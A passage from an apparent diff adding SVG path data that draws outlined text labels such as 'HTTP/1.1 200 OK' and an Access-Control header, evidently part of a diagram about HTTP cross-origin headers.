C247.823438,72.5807334 247.672398,73.3411425 247.370313,74.0078125 C247.068228,74.6744825 246.617712,75.2044251 246.01875,75.5976562 C245.419789,75.9908874 244.716671,76.1875 243.909375,76.1875 Z M253.794063,76.1796875 C252.653432,76.1796875 251.764118,75.7838581 251.126094,74.9921875 C250.48807,74.2005169 250.169063,73.1067778 250.169063,71.7109375 C250.169063,70.3984309 250.498487,69.3320354 251.157344,68.5117188 C251.816201,67.6914021 252.684682,67.28125 253.762813,67.28125 C254.294065,67.28125 254.82531,67.3958322 255.356563,67.625 C255.887815,67.8541678 256.291457,68.2109351 256.5675,68.6953125 L256.5675,64.1171875 L257.505,64.03125 L257.505,76 L256.700313,76 L256.559688,74.7109375 C256.262811,75.1953149 255.860472,75.5611967 255.352656,75.8085938 C254.844841,76.0559908 254.325315,76.1796875 253.794063,76.1796875 Z M253.770625,75.4140625 C254.255003,75.4140625 254.679478,75.3255217 255.044063,75.1484375 C255.408648,74.9713533 255.700312,74.7213558 255.919063,74.3984375 C256.137814,74.0755192 256.300573,73.7044292 256.407344,73.2851562 C256.514115,72.8658833 256.5675,72.4010442 256.5675,71.890625 C256.5675,69.3437373 255.63001,68.0703125 253.755,68.0703125 C253.31229,68.0703125 252.921669,68.1757802 252.583125,68.3867188 C252.244582,68.5976573 251.977657,68.8815086 251.782344,69.2382812 C251.587031,69.5950539 251.442501,69.9830708 251.34875,70.4023438 C251.255,70.8216167 251.208125,71.2630185 251.208125,71.7265625 C251.208125,72.1276062 251.236771,72.5039045 251.294063,72.8554688 C251.351355,73.207033 251.445104,73.5416651 251.575313,73.859375 C251.705522,74.1770849 251.866978,74.4492176 252.059688,74.6757812 C252.252397,74.9023449 252.494582,75.0820306 252.78625,75.2148438 C253.077918,75.3476569 253.40604,75.4140625 253.770625,75.4140625 Z M260.788125,76.2890625 L260.788125,74.640625 L262.186563,74.640625 L262.186563,76.2890625 L260.788125,76.2890625 Z M260.788125,68.7578125 L260.788125,67.125 L262.186563,67.125 L262.186563,68.7578125 L260.788125,68.7578125 Z M271.166875,75.1640625 L273.448125,75.1640625 C275.062717,75.1640625 276.293173,74.7513062 277.139531,73.9257812 C277.98589,73.1002563 278.409063,71.8697998 278.409063,70.234375 C278.409063,69.3385372 278.290574,68.5651074 278.053594,67.9140625 C277.816614,67.2630176 277.468961,66.7408874 277.010625,66.3476562 C276.55229,65.9544251 276.010628,65.6653655 275.385625,65.4804688 C274.760622,65.295572 274.039275,65.203125 273.221563,65.203125 L271.166875,65.203125 L271.166875,75.1640625 Z M270.166875,76 L270.166875,64.375 L273.315313,64.375 C274.263234,64.375 275.110882,64.486978 275.858281,64.7109375 C276.605681,64.934897 277.255414,65.2773414 277.8075,65.7382812 C278.359586,66.1992211 278.784061,66.8059858 279.080938,67.5585938 C279.377814,68.3112017 279.52625,69.1900991 279.52625,70.1953125 C279.52625,72.0963637 279.002818,73.5390576 277.955938,74.5234375 C276.909057,75.5078174 275.442926,76 273.5575,76 L270.166875,76 Z M282.7,76 L282.7,64.375 L289.176563,64.375 L289.1375,65.203125 L283.7,65.203125 L283.7,69.578125 L288.871875,69.578125 L288.871875,70.4296875 L283.7,70.4296875 L283.7,75.1640625 L289.309375,75.1640625 L289.223438,76 L282.7,76 Z M292.451875,76 L292.451875,64.375 L293.459688,64.375 L293.459688,75.1171875 L298.68625,75.1171875 L298.639375,76 L292.451875,76 Z M301.07875,76 L301.07875,64.375 L307.555313,64.375 L307.51625,65.203125 L302.07875,65.203125 L302.07875,69.578125 L307.250625,69.578125 L307.250625,70.4296875 L302.07875,70.4296875 L302.07875,75.1640625 L307.688125,75.1640625 L307.602188,76 L301.07875,76 Z M313.1275,76 L313.1275,65.234375 L309.47125,65.234375 L309.47125,64.375 L317.799375,64.375 L317.799375,65.234375 L314.143125,65.234375 L314.143125,76 L313.1275,76 Z M320.11375,76 L320.11375,64.375 L326.590313,64.375 L326.55125,65.203125 L321.11375,65.203125 L321.11375,69.578125 L326.285625,69.578125 L326.285625,70.4296875 L321.11375,70.4296875 L321.11375,75.1640625 L326.723125,75.1640625 L326.637188,76 L320.11375,76 Z M329.459375,78.1484375 L330.084375,74.1640625 L331.092188,74.1640625 L331.092188,74.484375 C330.878645,75.411463 330.521878,76.6328049 330.021875,78.1484375 L329.459375,78.1484375 Z M344.0725,76.1796875 C343.364163,76.1796875 342.711826,76.0794281 342.115469,75.8789062 C341.519112,75.6783844 341.004794,75.3984393 340.5725,75.0390625 C340.140206,74.6796857 339.774324,74.2513046 339.474844,73.7539062 C339.175363,73.2565079 338.951407,72.7096384 338.802969,72.1132812 C338.654531,71.5169241 338.580313,70.88542 338.580313,70.21875 C338.580313,69.0468691 338.79906,68.0091191 339.236563,67.1054688 C339.674065,66.2018184 340.326402,65.4869818 341.193594,64.9609375 C342.060786,64.4348932 343.088119,64.171875 344.275625,64.171875 C345.577715,64.171875 346.733953,64.4713512 347.744375,65.0703125 L347.299063,65.875 C346.871977,65.614582 346.388909,65.4049487 345.849844,65.2460938 C345.310779,65.0872388 344.788648,65.0078125 344.283438,65.0078125 C343.523017,65.0078125 342.844638,65.1432278 342.248281,65.4140625 C341.651924,65.6848972 341.168856,66.0585914 340.799063,66.5351562 C340.429269,67.0117211 340.149324,67.5598927 339.959219,68.1796875 C339.769114,68.7994823 339.674063,69.4739547 339.674063,70.203125 C339.674063,70.9791705 339.770416,71.6796844 339.963125,72.3046875 C340.155834,72.9296906 340.444894,73.4700498 340.830313,73.9257812 C341.215731,74.3815127 341.710518,74.7330717 342.314688,74.9804688 C342.918857,75.2278658 343.616767,75.3515625 344.408438,75.3515625 C345.22615,75.3515625 346.127183,75.156252 347.111563,74.765625 L347.111563,71.046875 L344.22875,71.046875 L344.29125,70.1796875 L348.04125,70.1796875 L348.04125,75.3046875 C347.40583,75.6328141 346.789951,75.8606764 346.193594,75.9882812 C345.597237,76.1158861 344.890212,76.1796875 344.0725,76.1796875 Z M351.386875,76 L351.386875,64.375 L357.863438,64.375 L357.824375,65.203125 L352.386875,65.203125 L352.386875,69.578125 L357.55875,69.578125 L357.55875,70.4296875 L352.386875,70.4296875 L352.386875,75.1640625 L357.99625,75.1640625 L357.910313,76 L351.386875,76 Z M363.435625,76 L363.435625,65.234375 L359.779375,65.234375 L359.779375,64.375 L368.1075,64.375 L368.1075,65.234375 L364.45125,65.234375 L364.45125,76 L363.435625,76 Z" id="Access-Control-Allow"></path>
+            </g>
+            <g id="Group-3" transform="translate(625.000000, 748.000000)" fill="#D3DDE2">
+                <path d="M237.696563,16 L237.696563,4.375 L238.696563,4.375 L238.696563,9.515625 L245.368438,9.515625 L245.368438,4.375 L246.368438,4.375 L246.368438,16 L245.368438,16 L245.368438,10.390625 L238.696563,10.390625 L238.696563,16 L237.696563,16 Z M252.339063,16 L252.339063,5.234375 L248.682813,5.234375 L248.682813,4.375 L257.010938,4.375 L257.010938,5.234375 L253.354688,5.234375 L253.354688,16 L252.339063,16 Z M261.622188,16 L261.622188,5.234375 L257.965938,5.234375 L257.965938,4.375 L266.294063,4.375 L266.294063,5.234375 L262.637813,5.234375 L262.637813,16 L261.622188,16 Z M268.608438,16 L268.608438,4.375 L272.163125,4.375 C272.663128,4.375 273.118852,4.42838488 273.530313,4.53515625 C273.941773,4.64192762 274.312863,4.80729055 274.643594,5.03125 C274.974325,5.25520945 275.230833,5.55859184 275.413125,5.94140625 C275.595418,6.32422066 275.686563,6.77083078 275.686563,7.28125 C275.686563,7.57812648 275.67224,7.8450509 275.643594,8.08203125 C275.614948,8.3190116 275.561563,8.56249875 275.483438,8.8125 C275.405312,9.06250125 275.299845,9.28124906 275.167031,9.46875 C275.034218,9.65625094 274.859741,9.83593664 274.643594,10.0078125 C274.427447,10.1796884 274.172241,10.320312 273.877969,10.4296875 C273.583697,10.539063 273.230836,10.6249997 272.819375,10.6875 C272.407915,10.7500003 271.944378,10.78125 271.42875,10.78125 C270.876664,10.78125 270.272503,10.7473962 269.61625,10.6796875 L269.61625,16 L268.608438,16 Z M271.530313,9.9140625 C272.134482,9.9140625 272.647498,9.85416727 273.069375,9.734375 C273.491252,9.61458273 273.806353,9.47916742 274.014688,9.328125 C274.223022,9.17708258 274.381875,8.96354305 274.49125,8.6875 C274.600626,8.41145695 274.661823,8.190105 274.674844,8.0234375 C274.687865,7.85677 274.694375,7.62239734 274.694375,7.3203125 L274.694375,7.2734375 C274.694375,6.59114242 274.462607,6.083335 273.999063,5.75 C273.535519,5.416665 272.936566,5.25 272.202188,5.25 L269.61625,5.25 L269.61625,9.8203125 C270.074586,9.88281281 270.7126,9.9140625 271.530313,9.9140625 Z M277.516563,17.359375 L282.993125,4.171875 L283.875938,4.171875 L278.391563,17.359375 L277.516563,17.359375 Z M287.549688,16 L287.549688,5.40625 C287.38302,5.52604227 287.1187,5.67447828 286.756719,5.8515625 C286.394738,6.02864672 286.034064,6.17968687 285.674688,6.3046875 L285.674688,5.4609375 C286.768443,4.95572664 287.453332,4.59375109 287.729375,4.375 L288.549688,4.375 L288.549688,16 L287.549688,16 Z M293.184375,16.0625 C292.908332,16.0625 292.700001,15.9817716 292.559375,15.8203125 C292.418749,15.6588534 292.348438,15.4687511 292.348438,15.25 C292.348438,15.0364573 292.418749,14.8489591 292.559375,14.6875 C292.700001,14.5260409 292.908332,14.4453125 293.184375,14.4453125 C293.470835,14.4453125 293.684374,14.5260409 293.825,14.6875 C293.965626,14.8489591 294.035938,15.0364573 294.035938,15.25 C294.035938,15.4687511 293.965626,15.6588534 293.825,15.8203125 C293.684374,15.9817716 293.470835,16.0625 293.184375,16.0625 Z M297.928438,16 L297.928438,5.40625 C297.76177,5.52604227 297.49745,5.67447828 297.135469,5.8515625 C296.773488,6.02864672 296.412814,6.17968687 296.053438,6.3046875 L296.053438,5.4609375 C297.147193,4.95572664 297.832082,4.59375109 298.108125,4.375 L298.928438,4.375 L298.928438,16 L297.928438,16 Z M311.223125,16 L310.98875,15.0078125 L315.043438,10.2890625 C315.57469,9.65885102 315.97052,9.11067941 316.230938,8.64453125 C316.491356,8.17838309 316.621563,7.72396055 316.621563,7.28125 C316.621563,6.54166297 316.447085,5.97526238 316.098125,5.58203125 C315.749165,5.18880012 315.228337,4.9921875 314.535625,4.9921875 C314.040831,4.9921875 313.555159,5.06640551 313.078594,5.21484375 C312.602029,5.36328199 312.21271,5.58072773 311.910625,5.8671875 L311.543438,5.109375 C312.194483,4.48437188 313.204889,4.171875 314.574688,4.171875 C315.569484,4.171875 316.354633,4.44530977 316.930156,4.9921875 C317.50568,5.53906523 317.793438,6.25780805 317.793438,7.1484375 C317.793438,7.74739883 317.641095,8.33723668 317.336406,8.91796875 C317.031717,9.49870082 316.53042,10.1927043 315.8325,11 L312.316875,15.0390625 L317.887188,15.0390625 L317.824688,16 L311.223125,16 Z M324.709375,15.2890625 C325.506254,15.2890625 326.149477,14.8112027 326.639063,13.8554688 C327.128648,12.8997348 327.373438,11.6145914 327.373438,10 C327.373438,8.41665875 327.128648,7.15495262 326.639063,6.21484375 C326.149477,5.27473488 325.508858,4.8046875 324.717188,4.8046875 C323.920309,4.8046875 323.277086,5.27603695 322.7875,6.21875 C322.297914,7.16146305 322.055729,8.42707539 322.060938,10.015625 C322.060938,11.6302164 322.304425,12.9127557 322.791406,13.8632812 C323.278388,14.8138068 323.917704,15.2890625 324.709375,15.2890625 Z M324.717188,16.1875 C324.060934,16.1875 323.482815,16.039064 322.982813,15.7421875 C322.48281,15.445311 322.077866,15.0221382 321.767969,14.4726562 C321.458071,13.9231743 321.226303,13.2786495 321.072656,12.5390625 C320.91901,11.7994755 320.842188,10.9661505 320.842188,10.0390625 C320.842188,8.08592773 321.174216,6.57552617 321.838281,5.5078125 C322.502347,4.44009883 323.461973,3.90625 324.717188,3.90625 C325.972402,3.90625 326.92682,4.43879676 327.580469,5.50390625 C328.234118,6.56901574 328.560938,8.08071938 328.560938,10.0390625 C328.560938,10.9661505 328.485418,11.7994755 328.334375,12.5390625 C328.183333,13.2786495 327.954168,13.9231743 327.646875,14.4726562 C327.339582,15.0221382 326.938544,15.445311 326.44375,15.7421875 C325.948956,16.039064 325.373441,16.1875 324.717188,16.1875 Z M335.039375,15.2890625 C335.836254,15.2890625 336.479477,14.8112027 336.969063,13.8554688 C337.458648,12.8997348 337.703438,11.6145914 337.703438,10 C337.703438,8.41665875 337.458648,7.15495262 336.969063,6.21484375 C336.479477,5.27473488 335.838858,4.8046875 335.047188,4.8046875 C334.250309,4.8046875 333.607086,5.27603695 333.1175,6.21875 C332.627914,7.16146305 332.385729,8.42707539 332.390938,10.015625 C332.390938,11.6302164 332.634425,12.9127557 333.121406,13.8632812 C333.608388,14.8138068 334.247704,15.2890625 335.039375,15.2890625 Z M335.047188,16.1875 C334.390934,16.1875 333.812815,16.039064 333.312813,15.7421875 C332.81281,15.445311 332.407866,15.0221382 332.097969,14.4726562 C331.788071,13.9231743 331.556303,13.2786495 331.402656,12.5390625 C331.24901,11.7994755 331.172188,10.9661505 331.172188,10.0390625 C331.172188,8.08592773 331.504215,6.57552617 332.168281,5.5078125 C332.832347,4.44009883 333.791973,3.90625 335.047188,3.90625 C336.302402,3.90625 337.25682,4.43879676 337.910469,5.50390625 C338.564118,6.56901574 338.890938,8.08071938 338.890938,10.0390625 C338.890938,10.9661505 338.815417,11.7994755 338.664375,12.5390625 C338.513333,13.2786495 338.284168,13.9231743 337.976875,14.4726562 C337.669582,15.0221382 337.268544,15.445311 336.77375,15.7421875 C336.278956,16.039064 335.703441,16.1875 335.047188,16.1875 Z M351.43375,15.359375 C352.392088,15.359375 353.19807,15.1406272 353.851719,14.703125 C354.505368,14.2656228 354.98453,13.6653684 355.289219,12.9023438 C355.593908,12.1393191 355.74625,11.2317761 355.74625,10.1796875 C355.74625,8.53384594 355.38167,7.26042117 354.6525,6.359375 C353.92333,5.45832883 352.853028,5.0078125 351.441563,5.0078125 C350.01968,5.0078125 348.93766,5.45702676 348.195469,6.35546875 C347.453278,7.25391074 347.082188,8.52863758 347.082188,10.1796875 C347.082188,11.7786538 347.450673,13.041662 348.187656,13.96875 C348.924639,14.895838 350.00666,15.359375 351.43375,15.359375 Z M351.43375,16.1796875 C350.548329,16.1796875 349.757972,16.0325536 349.062656,15.7382812 C348.36734,15.4440089 347.797034,15.0299506 347.351719,14.4960938 C346.906404,13.9622369 346.567866,13.3307328 346.336094,12.6015625 C346.104322,11.8723922 345.988438,11.0677127 345.988438,10.1875 C345.988438,8.34374078 346.463693,6.88021375 347.414219,5.796875 C348.364744,4.71353625 349.707179,4.171875 351.441563,4.171875 C353.144696,4.171875 354.472808,4.71744246 355.425938,5.80859375 C356.379067,6.89974504 356.855625,8.36197 356.855625,10.1953125 C356.855625,11.0546918 356.738439,11.8476526 356.504063,12.5742188 C356.269686,13.3007849 355.929846,13.932289 355.484531,14.46875 C355.039217,15.005211 354.470212,15.4244777 353.7775,15.7265625 C353.084788,16.0286473 352.303546,16.1796875 351.43375,16.1796875 Z M360.029375,16 L360.029375,4.375 L361.037188,4.375 L361.037188,10.3828125 C361.266355,10.1276029 361.568436,9.79297082 361.943438,9.37890625 C362.318439,8.96484168 362.903069,8.3190148 363.697344,7.44140625 C364.491619,6.5637977 365.151768,5.83333625 365.677813,5.25 L366.466875,4.375 L367.787188,4.375 L362.935625,9.6171875 L368.185625,16 L366.912188,16 L362.17,10.2265625 L361.037188,11.2890625 L361.037188,16 L360.029375,16 Z" id="HTTP/1.1-200-OK-Copy"></path>
+                <path d="M127.318751,47 L131.857813,35.375 L132.818751,35.375 L137.193751,47 L136.162501,47 L134.678126,43.0546875 L129.857813,43.0546875 L128.310938,47 L127.318751,47 Z M130.240626,42.3203125 L134.318751,42.3203125 C133.14687,38.9557123 132.482814,36.9765655 132.326563,36.3828125 C132.264063,36.6119803 132.058336,37.2213492 131.709376,38.2109375 C131.360415,39.2005258 131.027085,40.1328081 130.709376,41.0078125 L130.240626,42.3203125 Z M142.789375,47.1875 C141.961246,47.1875 141.242504,46.984377 140.633125,46.578125 C140.023747,46.171873 139.570627,45.6419304 139.27375,44.9882812 C138.976874,44.3346321 138.828438,43.6067748 138.828438,42.8046875 C138.828438,42.1901011 138.916979,41.6119819 139.094063,41.0703125 C139.271147,40.5286431 139.522447,40.0494812 139.847969,39.6328125 C140.173492,39.2161438 140.592758,38.88672 141.105782,38.6445312 C141.618805,38.4023425 142.190414,38.28125 142.820625,38.28125 C143.232086,38.28125 143.642238,38.335937 144.051094,38.4453125 C144.45995,38.554688 144.763333,38.6848951 144.96125,38.8359375 L144.656563,39.5625 C144.120102,39.2604152 143.484692,39.109375 142.750313,39.109375 C141.859684,39.109375 141.153961,39.4466112 140.633125,40.1210938 C140.11229,40.7955763 139.851875,41.6900986 139.851875,42.8046875 C139.851875,43.8724012 140.110987,44.7356738 140.629219,45.3945312 C141.147451,46.0533887 141.854475,46.3828125 142.750313,46.3828125 C143.375316,46.3828125 144.047184,46.2265641 144.765938,45.9140625 L144.914375,46.609375 C144.669583,46.7916676 144.351877,46.9335932 143.96125,47.0351562 C143.570624,47.1367193 143.180002,47.1875 142.789375,47.1875 Z M151.033438,47.1875 C150.205309,47.1875 149.486566,46.984377 148.877188,46.578125 C148.26781,46.171873 147.814689,45.6419304 147.517813,44.9882812 C147.220936,44.3346321 147.0725,43.6067748 147.0725,42.8046875 C147.0725,42.1901011 147.161041,41.6119819 147.338125,41.0703125 C147.51521,40.5286431 147.766509,40.0494812 148.092032,39.6328125 C148.417554,39.2161438 148.836821,38.88672 149.349844,38.6445312 C149.862868,38.4023425 150.434476,38.28125 151.064688,38.28125 C151.476148,38.28125 151.886301,38.335937 152.295157,38.4453125 C152.704013,38.554688 153.007395,38.6848951 153.205313,38.8359375 L152.900625,39.5625 C152.364164,39.2604152 151.728754,39.109375 150.994375,39.109375 C150.103746,39.109375 149.398024,39.4466112 148.877188,40.1210938 C148.356352,40.7955763 148.095938,41.6900986 148.095938,42.8046875 C148.095938,43.8724012 148.35505,44.7356738 148.873282,45.3945312 C149.391513,46.0533887 150.098538,46.3828125 150.994375,46.3828125 C151.619379,46.3828125 152.291247,46.2265641 153.01,45.9140625 L153.158438,46.609375 C152.913645,46.7916676 152.59594,46.9335932 152.205313,47.0351562 C151.814686,47.1367193 151.424065,47.1875 151.033438,47.1875 Z M159.269688,47.1875 C158.08739,47.1875 157.148598,46.7916706 156.453282,46 C155.757966,45.2083294 155.410313,44.1354234 155.410313,42.78125 C155.410313,41.4739518 155.750153,40.40365 156.429844,39.5703125 C157.109535,38.736975 157.988433,38.3072918 159.066563,38.28125 C160.071776,38.28125 160.87906,38.6406214 161.488438,39.359375 C162.097816,40.0781286 162.4025,41.0416606 162.4025,42.25 C162.4025,42.2968752 162.401198,42.3919264 162.398594,42.5351562 C162.39599,42.6783861 162.394688,42.7786455 162.394688,42.8359375 L156.43375,42.8359375 C156.444167,43.9349013 156.70979,44.8059864 157.230625,45.4492188 C157.751461,46.0924511 158.438955,46.4140625 159.293125,46.4140625 C159.85042,46.4140625 160.33479,46.348959 160.74625,46.21875 C161.157711,46.088541 161.587394,45.903647 162.035313,45.6640625 L162.199375,46.390625 C161.334788,46.9218777 160.358235,47.1875 159.269688,47.1875 Z M156.472813,42.0546875 L161.347813,42.0546875 C161.347813,41.1015577 161.142086,40.3710963 160.730625,39.8632812 C160.319165,39.3554662 159.754067,39.1015625 159.035313,39.1015625 C158.306143,39.1015625 157.717607,39.3723931 157.269688,39.9140625 C156.821769,40.4557319 156.556147,41.1692664 156.472813,42.0546875 Z M167.67,47.1953125 C167.117914,47.1953125 166.59969,47.1276048 166.115313,46.9921875 C165.630936,46.8567702 165.248127,46.6953134 164.966875,46.5078125 L165.1075,45.6953125 C165.96688,46.1432314 166.789788,46.3671875 167.57625,46.3671875 C168.987716,46.3671875 169.719479,45.8437552 169.771563,44.796875 C169.771563,44.3593728 169.629637,44.0156262 169.345782,43.765625 C169.061926,43.5156238 168.492921,43.2552097 167.63875,42.984375 C167.190832,42.8281242 166.943438,42.7421876 166.896563,42.7265625 C165.558015,42.3203105 164.883542,41.5989635 164.873125,40.5625 C164.873125,39.9635387 165.137446,39.4335961 165.666094,38.9726562 C166.194743,38.5117164 166.909579,38.28125 167.810625,38.28125 C168.711672,38.28125 169.558017,38.4583316 170.349688,38.8125 L170.021563,39.53125 C169.219476,39.2291652 168.474691,39.078125 167.787188,39.078125 C167.183018,39.078125 166.707763,39.2135403 166.361407,39.484375 C166.015051,39.7552097 165.841875,40.1197894 165.841875,40.578125 C165.841875,40.9635436 165.955156,41.2591136 166.181719,41.4648438 C166.408283,41.6705739 166.857497,41.8671866 167.529375,42.0546875 C167.602292,42.0755209 167.736406,42.1223955 167.931719,42.1953125 C168.127033,42.2682295 168.235104,42.3072916 168.255938,42.3125 C169.156984,42.588543 169.785884,42.9153627 170.142657,43.2929688 C170.499429,43.6705748 170.677813,44.1848926 170.677813,44.8359375 C170.662188,45.5859413 170.382243,46.1666646 169.837969,46.578125 C169.293696,46.9895854 168.571047,47.1953125 167.67,47.1953125 Z M175.875,47.1953125 C175.322914,47.1953125 174.80469,47.1276048 174.320313,46.9921875 C173.835935,46.8567702 173.453127,46.6953134 173.171875,46.5078125 L173.3125,45.6953125 C174.17188,46.1432314 174.994788,46.3671875 175.78125,46.3671875 C177.192716,46.3671875 177.924479,45.8437552 177.976563,44.796875 C177.976563,44.3593728 177.834637,44.0156262 177.550782,43.765625 C177.266926,43.5156238 176.697921,43.2552097 175.84375,42.984375 C175.395832,42.8281242 175.148438,42.7421876 175.101563,42.7265625 C173.763015,42.3203105 173.088542,41.5989635 173.078125,40.5625 C173.078125,39.9635387 173.342446,39.4335961 173.871094,38.9726562 C174.399743,38.5117164 175.114579,38.28125 176.015625,38.28125 C176.916672,38.28125 177.763017,38.4583316 178.554688,38.8125 L178.226563,39.53125 C177.424476,39.2291652 176.679691,39.078125 175.992188,39.078125 C175.388018,39.078125 174.912763,39.2135403 174.566407,39.484375 C174.220051,39.7552097 174.046875,40.1197894 174.046875,40.578125 C174.046875,40.9635436 174.160156,41.2591136 174.386719,41.4648438 C174.613283,41.6705739 175.062497,41.8671866 175.734375,42.0546875 C175.807292,42.0755209 175.941406,42.1223955 176.136719,42.1953125 C176.332033,42.2682295 176.440104,42.3072916 176.460938,42.3125 C177.361984,42.588543 177.990884,42.9153627 178.347657,43.2929688 C178.704429,43.6705748 178.882813,44.1848926 178.882813,44.8359375 C178.867188,45.5859413 178.587243,46.1666646 178.042969,46.578125 C177.498696,46.9895854 176.776047,47.1953125 175.875,47.1953125 Z M181.158125,42.8515625 L181.158125,41.9921875 L184.939375,41.9921875 L184.939375,42.8515625 L181.158125,42.8515625 Z M192.8475,47.1796875 C191.956871,47.1796875 191.162608,47.0273453 190.464688,46.7226562 C189.766768,46.4179672 189.197763,45.9947944 188.757657,45.453125 C188.31755,44.9114556 187.98422,44.2760453 187.757657,43.546875 C187.531093,42.8177047 187.417813,42.0182335 187.417813,41.1484375 C187.417813,39.9921817 187.63005,38.9674524 188.054532,38.0742188 C188.479013,37.1809851 189.113121,36.4739609 189.956875,35.953125 C190.80063,35.4322891 191.798015,35.171875 192.949063,35.171875 C194.214694,35.171875 195.292808,35.4374973 196.183438,35.96875 L195.706875,36.7421875 C194.894371,36.2526017 193.977714,36.0078125 192.956875,36.0078125 C192.24333,36.0078125 191.602712,36.1419257 191.035,36.4101562 C190.467289,36.6783868 190.00245,37.0494768 189.640469,37.5234375 C189.278488,37.9973982 189.002449,38.5468719 188.812344,39.171875 C188.622239,39.7968781 188.527188,40.4739547 188.527188,41.203125 C188.527188,41.9166702 188.614427,42.5768199 188.788907,43.1835938 C188.963387,43.7903676 189.226405,44.3320289 189.577969,44.8085938 C189.929533,45.2851586 190.396977,45.6601549 190.980313,45.9335938 C191.563649,46.2070326 192.235517,46.34375 192.995938,46.34375 C193.81365,46.34375 194.7251,46.1171898 195.730313,45.6640625 L195.933438,46.46875 C195.173017,46.9427107 194.144382,47.1796875 192.8475,47.1796875 Z M202.068125,46.4140625 C202.693128,46.4140625 203.220467,46.2486996 203.650157,45.9179688 C204.079846,45.5872379 204.392343,45.1510444 204.587657,44.609375 C204.78297,44.0677056 204.880625,43.445316 204.880625,42.7421875 C204.880625,41.6380153 204.646253,40.7500034 204.1775,40.078125 C203.708748,39.4062466 202.995213,39.0703125 202.036875,39.0703125 C201.411872,39.0703125 200.879325,39.2382796 200.439219,39.5742188 C199.999113,39.9101579 199.677501,40.3502577 199.474375,40.8945312 C199.271249,41.4388048 199.169688,42.0624965 199.169688,42.765625 C199.169688,43.8333387 199.418383,44.7083299 199.915782,45.390625 C200.41318,46.0729201 201.130621,46.4140625 202.068125,46.4140625 Z M201.997813,47.1875 C201.221767,47.1875 200.53818,46.9921895 199.947032,46.6015625 C199.355883,46.2109355 198.905366,45.6809929 198.595469,45.0117188 C198.285572,44.3424446 198.130625,43.5859417 198.130625,42.7421875 C198.130625,42.1067677 198.220468,41.5169298 198.400157,40.9726562 C198.579845,40.4283827 198.836353,39.9570332 199.169688,39.5585938 C199.503023,39.1601543 199.917081,38.8476574 200.411875,38.6210938 C200.90667,38.3945301 201.456143,38.28125 202.060313,38.28125 C202.8624,38.28125 203.557706,38.4778626 204.14625,38.8710938 C204.734795,39.2643249 205.176197,39.7929654 205.470469,40.4570312 C205.764741,41.1210971 205.911875,41.8775999 205.911875,42.7265625 C205.911875,43.5807334 205.760835,44.3411425 205.45875,45.0078125 C205.156666,45.6744825 204.706149,46.2044251 204.107188,46.5976562 C203.508227,46.9908874 202.805109,47.1875 201.997813,47.1875 Z M208.648125,47 L208.648125,38.4375 L209.491875,38.4375 L209.624688,39.7578125 C209.931981,39.2994769 210.344737,38.9388034 210.862969,38.6757812 C211.381201,38.4127591 211.939789,38.28125 212.53875,38.28125 C213.52313,38.28125 214.247081,38.5520806 214.710625,39.09375 C215.174169,39.6354194 215.405938,40.4999941 215.405938,41.6875 L215.405938,47 L214.429375,47 L214.429375,41.25 C214.403334,40.4895795 214.241877,39.94271 213.945,39.609375 C213.648124,39.27604 213.16115,39.109375 212.484063,39.109375 C211.708017,39.109375 211.073909,39.3046855 210.581719,39.6953125 C210.089529,40.0859395 209.780938,40.5911427 209.655938,41.2109375 C209.635104,41.4557304 209.624688,41.7109362 209.624688,41.9765625 L209.624688,47 L208.648125,47 Z M220.892188,47.1796875 C220.173434,47.1796875 219.647398,47.0169287 219.314063,46.6914062 C218.980728,46.3658838 218.814063,45.8359412 218.814063,45.1015625 L218.814063,39.1484375 L217.603125,39.1484375 L217.673438,38.5625 L218.829688,38.453125 L219.0875,36.4921875 L219.767188,36.4453125 L219.767188,38.4375 L222.267188,38.4375 L222.267188,39.1484375 L219.767188,39.1484375 L219.767188,44.8984375 C219.767188,45.5026072 219.866145,45.9075511 220.064063,46.1132812 C220.26198,46.3190114 220.610935,46.421875 221.110938,46.421875 C221.433856,46.421875 221.834894,46.3619798 222.314063,46.2421875 L222.353125,46.9921875 C221.722914,47.1171881 221.23594,47.1796875 220.892188,47.1796875 Z M224.605,47 C224.594584,41.9739332 224.589375,39.1197951 224.589375,38.4375 L225.38625,38.4375 L225.44875,40.125 C225.756044,39.6145808 226.146665,39.1979183 226.620625,38.875 C227.094586,38.5520817 227.589373,38.390625 228.105,38.390625 C228.318543,38.390625 228.547707,38.408854 228.7925,38.4453125 L228.722188,39.25 C228.534687,39.2187498 228.336772,39.203125 228.128438,39.203125 C227.404476,39.203125 226.796409,39.4882784 226.304219,40.0585938 C225.812029,40.6289091 225.565938,41.3046836 225.565938,42.0859375 L225.565938,47 L224.605,47 Z M234.40375,46.4140625 C235.028753,46.4140625 235.556092,46.2486996 235.985782,45.9179688 C236.415471,45.5872379 236.727968,45.1510444 236.923282,44.609375 C237.118595,44.0677056 237.21625,43.445316 237.21625,42.7421875 C237.21625,41.6380153 236.981878,40.7500034 236.513125,40.078125 C236.044373,39.4062466 235.330838,39.0703125 234.3725,39.0703125 C233.747497,39.0703125 233.21495,39.2382796 232.774844,39.5742188 C232.334738,39.9101579 232.013126,40.3502577 231.81,40.8945312 C231.606874,41.4388048 231.505313,42.0624965 231.505313,42.765625 C231.505313,43.8333387 231.754008,44.7083299 232.251407,45.390625 C232.748805,46.0729201 233.466246,46.4140625 234.40375,46.4140625 Z M234.333438,47.1875 C233.557392,47.1875 232.873805,46.9921895 232.282657,46.6015625 C231.691508,46.2109355 231.240991,45.6809929 230.931094,45.0117188 C230.621197,44.3424446 230.46625,43.5859417 230.46625,42.7421875 C230.46625,42.1067677 230.556093,41.5169298 230.735782,40.9726562 C230.91547,40.4283827 231.171978,39.9570332 231.505313,39.5585938 C231.838648,39.1601543 232.252706,38.8476574 232.7475,38.6210938 C233.242294,38.3945301 233.791768,38.28125 234.395938,38.28125 C235.198025,38.28125 235.893331,38.4778626 236.481875,38.8710938 C237.07042,39.2643249 237.511822,39.7929654 237.806094,40.4570312 C238.100366,41.1210971 238.2475,41.8775999 238.2475,42.7265625 C238.2475,43.5807334 238.09646,44.3411425 237.794375,45.0078125 C237.49229,45.6744825 237.041774,46.2044251 236.442813,46.5976562 C235.843851,46.9908874 235.140734,47.1875 234.333438,47.1875 Z M243.14,47.1796875 C242.421247,47.1796875 241.89521,47.0169287 241.561875,46.6914062 C241.22854,46.3658838 241.061875,45.8359412 241.061875,45.1015625 L241.061875,35.109375 L242.015,35.03125 L242.015,45.046875 C242.015,45.5677109 242.110051,45.9270823 242.300157,46.125 C242.490262,46.3229177 242.778019,46.421875 243.163438,46.421875 C243.475939,46.421875 243.86656,46.3619798 244.335313,46.2421875 L244.374375,46.9921875 C243.863956,47.1171881 243.452502,47.1796875 243.14,47.1796875 Z M245.930938,42.8515625 